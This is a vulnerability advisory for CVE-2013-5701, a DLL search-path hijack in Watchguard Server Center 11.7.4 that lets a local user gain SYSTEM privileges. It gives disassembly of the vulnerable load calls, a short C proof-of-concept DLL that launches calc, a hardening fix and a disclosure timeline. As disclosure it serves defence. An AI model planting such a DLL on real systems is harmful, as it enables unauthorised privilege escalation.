Watchguard Server Center 11.7.4 Insecure Library Loading

`Watchguard Server Center v11.7.4 wgpr.dll Insecure Library Loading Local  
Privilege Escalation Vulnerability  
  
RCE Security Advisory  
http://www.rcesecurity.com  
  
  
1. ADVISORY INFORMATION  
-----------------------  
Product: Watchguard Server Center  
Vendor URL: www.watchguard.com  
Type: Uncontrolled Search Path Element [CWE-427]  
Date found: 2013-07-29  
Date published: 2013-08-09  
CVSSv2 Score: 6,6 (AV:L/AC:M/Au:S/C:C/I:C/A:C)  
CVE: CVE-2013-5701  
  
  
2. CREDITS  
----------  
This vulnerability was discovered and researched by Julien Ahrens from  
RCE Security.  
  
  
3. VERSIONS AFFECTED  
--------------------  
Watchguard Server Center v11.7.4  
Watchguard Server Center v11.7.3  
and other older versions may be affected too.  
  
  
4. VULNERABILITY DESCRIPTION  
----------------------------  
An insecure library loading vulnerability has been identified in different  
components of the Watchguard Server Center v11.7.4.  
  
The application installs two services "Watchguard Log Collector"  
(%installdir%\wsm11\wlcollector\bin\wlcollector.exe)  
and "Watchguard WebBlocker Server"  
(%installdir%\wsm11\wbserver\bin\wbserver.exe).  
  
Both application services use a fixed path to look for specific files or  
libraries. This path includes directories that may not be trusted or under  
user control.  
  
By placing a custom version of a library in the application path, the  
program will load it before the legitimate version. This allows an attacker  
to inject custom code that will be run with the privilege of the program or  
user executing the program. The following libraries could be hijacked on  
this way:  
  
wgpr.dll  
  
Since both services are running using the SYSTEM account, this may allow a  
less privileged user to gain access to SYSTEM privileges. A local attacker  
or compromised process is able to put a malicious application library into  
the directory which will be executed after a service restart.  
  
On a default installation (%programfiles%\Watchguard) of the Watchguard  
Server Center on Windows Vista and above the directory permissions disallow  
an low-privileged attacker to mount the attack.  
  
On a default installation (%programfiles%\Watchguard) of the Watchguard  
Server Center on Windows XP, the attacker needs to have at least Power User  
rights to successfully mount the attack.  
  
On a non-default installation of the Watchguard Server Center to a  
directory, which is writeable by a low-privileged user, the attack can be  
mounted successfully without any restrictions.  
  
  
5. DEBUG INFORMATION  
--------------------  
The vulnerable code part of wlcollector.exe:  
  
00401691 MOV EDI,DWORD PTR DS:[<&KERNEL32.LoadLib>; kernel32.LoadLibraryA  
00401697 MOV ESI,EAX  
00401699 TEST ESI,ESI  
0040169B JE SHORT wlcollec.004016B3  
0040169D PUSH wlcollec.00409320 ; /ProcNameOrOrdinal  
004016A2 PUSH wlcollec.00409310 ; |/FileName = "kernel32.dll"  
004016A7 CALL EDI ; |\LoadLibraryA  
004016A9 PUSH EAX ; |hModule  
004016AA CALL EBX ; \GetProcAddress  
004016AC TEST EAX,EAX  
004016AE JE SHORT wlcollec.004016B3  
004016B0 PUSH ESI  
004016B1 CALL EAX  
004016B3 PUSH wlcollec.00409304 ; ASCII "wgpr.dll"  
004016B8 CALL EDI ; kernel32.LoadLibraryA  
  
The vulnerable code part of wbserver.exe  
  
00401041 MOV EDI,DWORD PTR DS:[<&KERNEL32.LoadLib>; kernel32.LoadLibraryA  
00401047 MOV ESI,EAX  
00401049 TEST ESI,ESI  
0040104B JE SHORT wbserver.00401063  
0040104D PUSH wbserver.00408284 ; /ProcNameOrOrdinal  
00401052 PUSH wbserver.00408274 ; |/FileName = "kernel32.dll"  
00401057 CALL EDI ; |\LoadLibraryA  
00401059 PUSH EAX ; |hModule  
0040105A CALL EBX ; \GetProcAddress  
0040105C TEST EAX,EAX  
0040105E JE SHORT wbserver.00401063  
00401060 PUSH ESI  
00401061 CALL EAX  
00401063 PUSH wbserver.00408268 ; ASCII "wgpr.dll"  
00401068 CALL EDI  
  
  
6. PROOF-OF-CONCEPT (CODE / EXPLOIT)  
------------------------------------  
Use the following code to exploit the vulnerability:  
  
#include <windows.h>  
  
#define DLL_EXPORT __declspec(dllexport)  
  
#ifdef __cplusplus  
extern "C"  
{  
#endif  
  
void DLL_EXPORT wgpr_library_get()  
{  
WinExec("calc",0);  
}  
  
#ifdef __cplusplus  
}  
#endif  
  
  
6. SOLUTION  
-----------  
Administrators who installed the Watchguard Server Center on WinXP or  
outside the default installation folder, should harden the directories  
permissions (administrative write permissions only) on the mentioned  
folders to lower the attack risk.  
  
  
7. REPORT TIMELINE  
------------------  
2013-07-29: Discovery of the vulnerability  
2013-07-30: RCE Security sends first notification to Customer Care via mail  
with disclosure date set to 13. August 2013  
2013-08-05: RCE Security sends second notification using Twitter  
2013-08-05: Response from vendor  
2013-08-05: RCE Security sends vulnerability details to vendor  
2013-08-05: Vendor ACKs the issue and asks for an extension of 30 days  
2013-08-06: New disclosure date set to 13. September 2013  
2013-08-06: Vendor assigns bug id #75251  
2013-08-19: No further status updates received according to disclosure  
policy, asking for status update  
2013-08-19: Vendor estimates the risk of the issue as "extremely limited",  
and therefor ACKs the public disclosure  
2013-08-28: Vendor plans to release the fix with the next major release in  
around Q4  
2013-09-05: MITRE assigns CVE-2013-5701 for this issue  
2013-09-08: Full Disclosure  
  
  
8. REFERENCES  
-------------  
https://www.rcesecurity.com/2013/09/cve-2013-5701-watchguard-server-center-v11-7-4-wgpr-dll-local-privileges-escalation-vulnerability/  
  
  
`